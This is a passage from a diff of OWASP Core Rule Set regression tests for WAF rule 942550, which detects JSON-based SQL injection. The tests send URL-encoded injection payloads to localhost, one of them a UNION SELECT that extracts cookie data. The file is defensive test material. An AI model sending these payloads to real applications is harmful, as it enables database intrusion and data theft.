"/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 9 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 10 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 11 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 12 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 13 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 14 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 15 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 16 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 17 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 18 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET 
+ port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 19 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 20 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 21 desc: | JSON in SQL (ARGS) decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 22 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - 
test_title: 942550-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 23 desc: | JSON in SQL (ARGS) decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 24 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie 
from cookie limit 1 ),NULL)) s(token)--/state stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 25 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":"b"}' ? 
'a' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 26 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":"b"}' ? 'a' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 27 desc: | JSON in SQL (ARGS) decoded payload: OR '[1,2]' ? 
'1' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 28 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '[1,2]' ? '1' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 29 desc: | JSON in SQL (ARGS) decoded payload: OR '{"name":"asd"}' ?| array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 30 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"name":"asd"}' ?| array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 31 desc: | JSON in SQL (ARGS) decoded payload: OR '{"name":"asd"}' ?& array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" - version: 
HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 32 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"name":"asd"}' ?& array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 33 desc: | JSON in SQL (ARGS) decoded payload: OR '[1,2,3]'::json ->> 2='3' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 34 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '[1,2,3]'::json ->> 2='3' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 35 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 
